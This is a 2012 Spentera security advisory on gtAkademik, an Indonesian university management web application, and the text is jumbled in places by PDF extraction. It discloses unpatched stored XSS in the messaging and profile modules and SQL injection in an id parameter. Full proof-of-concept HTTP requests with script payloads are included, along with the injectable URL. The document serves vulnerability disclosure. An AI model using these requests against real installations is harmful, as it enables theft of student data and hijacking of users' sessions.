You are on page 1of 6

Spentera

Security Advisory SPN-01-2012 gtAkademik Gamatechno SQL Injection and Persistent Cross Site Scripting Vulnerability
February 20, 2012

Copyright 2012. Spentera. All rights reserved. http://www.spentera.com

Version 1.3

Page 1

gtAkademik Gamatechno SQL Injection and Persistent Cross-site Scripting Security Advisory SPN-01-2012

Release Date Last Update Vendor Notification Date Product Platform Affected Versions Risk Factor Impact Attack Vector

Monday, February 20, 2012 Tuesday, June 19, 2012 PHP Friday, February 10, 2012 gtAkademik Gamatechno Latest release (2011) High

Tested on: Ubuntu 11.10, Apache 2.2.11, PHP 5.3.9 Loss of integrity and confidentiality on server and client side. side attack using XSS by edit existing user profile and inject javascript XSS shell. Unpatched

Attacker can retrieve data from target database and plan client

Solution Status

Software Description

GtAkademik Academica is a web-based application focuses on academic and administrative data management for university students, managing the activities of KRS, student's grading management, curriculum management & semester, until DIKTI reporting. GtAkademik also has features such as; Automation Reporting System For EPSBED DIKTI, Supports Curriculum
Copyright 2012. Spentera. All rights reserved. http://www.spentera.com Page 2

Version 1.3

Changes, Ease of management of Student Transcript, Virtual Class (eLearning), KRS and Online Coaching, and Reporting. Persistent XSS The Application allows an attacker to inject the XSS script inside the database (stored), because Update Profile Module. SQL Injection The Application also suffers to SQL injection vulnerability, also because there is no such important data, for example credentials that stored inside the database. sensitization process, this allow an attacker to extract contents of database, and find a lot of there is no such sanitations process. There are two modules suffer with XSS: Message Module and

Vulnerability Details

Proof of Concept

Persistent XSS in Message Module Message module is a module for internal messaging inside the gtAkademik, we can send an XSS crafted message to others for example we can send it to administrator user.
POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive

Copyright 2012. Spentera. All rights reserved. http://www.spentera.com

Version 1.3

Page 3

Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg == Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX Content-Type: application/x-www-form-urlencoded Content-Length: 169 data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX&data%5BMess ageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3E&act=doCompose&compBt n=Kirim

Persistent XSS in User Profile Module (save the user profile) Its a module used when we want to update the profile, we can inject an XSS into the profile and XSS. then save it into the database, so everyone who try to view our profile, can be attacked using the
POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo 3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/T nKM= Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX Content-Type: application/x-www-form-urlencoded Content-Length: 213 tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX&alamat=%3Cscript%3Ealert%28%22XSS%22% 29%3B%3C%2Fscript%3E&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp

Copyright 2012. Spentera. All rights reserved. http://www.spentera.com

Version 1.3

Page 4

_ortu=&simpan=Simpan

SQL Injection in id parameter. The parameter id is vulnerable to SQL Injection. TED PARAMETER]

http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204[INJEC

Solution
Unpatched

Discovered by
Mada R. Perdhana and Hanny Haliwela from Spentera Research.

Copyright 2012. Spentera. All rights reserved. http://www.spentera.com

Version 1.3

Page 5

About Us
Spentera is a limited liability security consulting company that focuses on penetration testing services, vulnerability discovery, and digital forensics. We have been providing satisfactory service to clients in Indonesia in particular, and the world at large. Our portfolio become a proof that we are building this company seriously and pay attention to every quality that is given to the client. All services we provide are based on international standards and are used as primary standards in some countries like the United States, Japan, Germany, France, and United Kingdom. Some of the clients that we handle include military, police, government, mining, oil and gas, and the private sector such as finance, and banking. Our security experts experience for 7 years has no doubt. Our good relationship with the client is the most important basis for quality of service that we continue to improve. Spentera Centerflix Boutique Office Jl. Danau Toba no. 104, Bendungan Hilir. Jakarta Pusat. 10210. Jakarta. Indonesia. T: +62(21) 5701505 F: +62(21) 5738105 W: http://www.spentera.com E: research@spentera.com

Copyright 2012. Spentera. All rights reserved. http://www.spentera.com

Version 1.3

Page 6